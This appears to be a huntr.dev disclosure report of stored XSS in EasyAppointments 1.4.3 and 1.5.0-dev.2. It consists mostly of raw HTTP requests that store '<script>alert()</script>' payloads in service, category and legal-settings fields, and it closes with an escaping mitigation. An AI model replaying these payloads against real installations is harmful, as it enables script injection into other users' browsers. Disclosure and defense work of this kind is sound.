Multiple XSS in Create/Update Function, Versions 1.4.3 and 1.5.0-dev.2

2023-03-28 16:00:35
tht1997
www.huntr.dev
Tags: stored xss, version 1.4.3, version 1.5.0-dev.2, demo site, local, proof of concept, update service, categories, settings, install, reproduce

EPSS: 0.001

Percentile: 34.5%

Description

Stored XSS in the create/update functions for services, categories and settings. I tested on 1.4.3 (demo site) and 1.5.0-dev.2.

Proof of Concept

Install
I installed from the develop branch. When the install finished, the footer displayed version v1.5.0-dev.2.
At the time I ran it, the commit shown in the image below was the latest.
[Image: lastest-commmit.png]
Web UI
[Image: version-2.png]

Alert on demo site: version 1.4.3

[Image: alert-1-4-1.png]
Reproduce on local
Request:

POST /easyappointments/index.php/services/update HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 482
Origin: http://localhost
Connection: close
Referer: http://localhost/easyappointments/index.php/services
Cookie: csrfCookie=3507348b3bb298f75c607b27d855dad1; ea_session=u4ub9lhann4css234pgt235217t2gfqb; csrf_cookie=1ad54974bc783c6d6831ad34a3b1ceb3
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

csrf_token=1ad54974bc783c6d6831ad34a3b1ceb3&service%5Bname%5D=Service%22%3E%3Cscript%3Ealert(String.fromCharCode(88%2C83%2C83))%3C%2Fscript%3E&service%5Bduration%5D=30&service%5Bprice%5D=0&service%5Bcurrency%5D=&service%5Bdescription%5D=1%22%3E%3Cscript%3Ealert(String.fromCharCode(88%2C83%2C83))%3C%2Fscript%3E&service%5Blocation%5D=&service%5Bcolor%5D=%23ebe07c&service%5Bavailabilities_type%5D=flexible&service%5Battendants_number%5D=1&service%5Bis_private%5D=0&service%5Bid%5D=1

Response:

{"success":true,"id":1}

Request:

POST /easyappointments/index.php/services/create HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 448
Origin: http://localhost
Connection: close
Referer: http://localhost/easyappointments/index.php/services
Cookie: csrfCookie=3507348b3bb298f75c607b27d855dad1; ea_session=u4ub9lhann4css234pgt235217t2gfqb; csrf_cookie=1ad54974bc783c6d6831ad34a3b1ceb3
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

csrf_token=1ad54974bc783c6d6831ad34a3b1ceb3&service%5Bname%5D=S2%22%3E%3Cscript%3Ealert(String.fromCharCode(88))%3C%2Fscript%3E&service%5Bduration%5D=30&service%5Bprice%5D=0&service%5Bcurrency%5D=&service%5Bdescription%5D=%22%3E%3Cscript%3Ealert(String.fromCharCode(88%2C83%2C83))%3C%2Fscript%3E&service%5Blocation%5D=&service%5Bcolor%5D=%237cbae8&service%5Bavailabilities_type%5D=flexible&service%5Battendants_number%5D=1&service%5Bis_private%5D=0

Response:

{"success":true,"id":3}

Request:

POST /easyappointments/index.php/categories/create HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 214
Origin: http://localhost
Connection: close
Referer: http://localhost/easyappointments/index.php/categories
Cookie: csrfCookie=3507348b3bb298f75c607b27d855dad1; ea_session=nfn5oc2bm60pr5lkaede42b97rgiag83; csrf_cookie=1ad54974bc783c6d6831ad34a3b1ceb3
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

csrf_token=1ad54974bc783c6d6831ad34a3b1ceb3&category%5Bname%5D=categories%22%3E%3Cscript%3Ealert('categories')%3C%2Fscript%3E&category%5Bdescription%5D=categories%22%3E%3Cscript%3Ealert('categories')%3C%2Fscript%3E

Response:

{"success":true,"id":3}

Request:

POST /easyappointments/index.php/categories/update HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 235
Origin: http://localhost
Connection: close
Referer: http://localhost/easyappointments/index.php/categories
Cookie: csrfCookie=3507348b3bb298f75c607b27d855dad1; ea_session=nfn5oc2bm60pr5lkaede42b97rgiag83; csrf_cookie=1ad54974bc783c6d6831ad34a3b1ceb3
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

csrf_token=1ad54974bc783c6d6831ad34a3b1ceb3&category%5Bname%5D=categories%22%3E%3Cscript%3Ealert('categories2')%3C%2Fscript%3E&category%5Bdescription%5D=categories%22%3E%3Cscript%3Ealert('categories2')%3C%2Fscript%3E&category%5Bid%5D=2

Response:

{"success":true,"id":2}

Request:

POST /easyappointments/index.php/legal_settings/save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 711
Origin: http://localhost
Connection: close
Referer: http://localhost/easyappointments/index.php/legal_settings
Cookie: csrfCookie=3507348b3bb298f75c607b27d855dad1; ea_session=96k2nk94s2cihcbevlmanv2mf76c84mk; csrf_cookie=1ad54974bc783c6d6831ad34a3b1ceb3
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

csrf_token=1ad54974bc783c6d6831ad34a3b1ceb3&legal_settings%5B0%5D%5Bname%5D=display_cookie_notice&legal_settings%5B0%5D%5Bvalue%5D=0&legal_settings%5B1%5D%5Bname%5D=cookie_notice_content&legal_settings%5B1%5D%5Bvalue%5D=1%22%3E%3Cscript%3Ealert('abc')%3C%2Fscript%3E&legal_settings%5B2%5D%5Bname%5D=display_terms_and_conditions&legal_settings%5B2%5D%5Bvalue%5D=0&legal_settings%5B3%5D%5Bname%5D=terms_and_conditions_content&legal_settings%5B3%5D%5Bvalue%5D=Terms+and+conditions+content.&legal_settings%5B4%5D%5Bname%5D=display_privacy_policy&legal_settings%5B4%5D%5Bvalue%5D=1&legal_settings%5B5%5D%5Bname%5D=privacy_policy_content&legal_settings%5B5%5D%5Bvalue%5D=1%22%3E%3Cscript%3Ealert('abc')%3C%2Fscript%3E

Alert
Open the booking link or the index page to view the alert.
[Image: alert-index.png]

[Image: booking-link.png]

[Image: alert-1.png]

[Image: alert-2.png]

Alert with settings
[Image: alert-3.png]
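As an added illustration (not code from the EasyAppointments project or from this report), the rendering pattern that turns a stored service name into executable markup, beside an output-encoding version that neutralises the values the requests above store. The sample record is constructed from the PoC payload; the function names are assumptions.

```javascript
// Added example, not EasyAppointments' own code: how a stored field becomes
// script, and the output-encoding step that prevents it.

// Constructed sample: the kind of value the PoC requests above store in
// service[name] and service[description].
const storedService = {
  id: 1,
  name: 'Service"><script>alert(String.fromCharCode(88,83,83))</script>',
  description: '1"><script>alert(String.fromCharCode(88,83,83))</script>',
};

// Vulnerable pattern: stored fields concatenated straight into markup that
// is later assigned to innerHTML, so the stored "><script> closes the cell
// and runs in every admin's browser that lists services.
function renderServiceUnsafe(service) {
  return '<tr data-id="' + service.id + '">' +
    '<td>' + service.name + '</td>' +
    '<td>' + service.description + '</td></tr>';
}

// Mitigation: HTML-entity encode every untrusted value at the point where
// it is turned into markup (or build the row with DOM APIs and textContent,
// which never parses the value as HTML).
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[ch]);
}

function renderServiceSafe(service) {
  return '<tr data-id="' + escapeHtml(service.id) + '">' +
    '<td>' + escapeHtml(service.name) + '</td>' +
    '<td>' + escapeHtml(service.description) + '</td></tr>';
}

// Defender check for a render test: does the produced markup contain a
// script element that the template never intended to emit?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}
```

The same encoding applies to the category and legal-settings fields in the later requests; the fix belongs where data is rendered, since the create/update endpoints accept the values as legitimate text.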
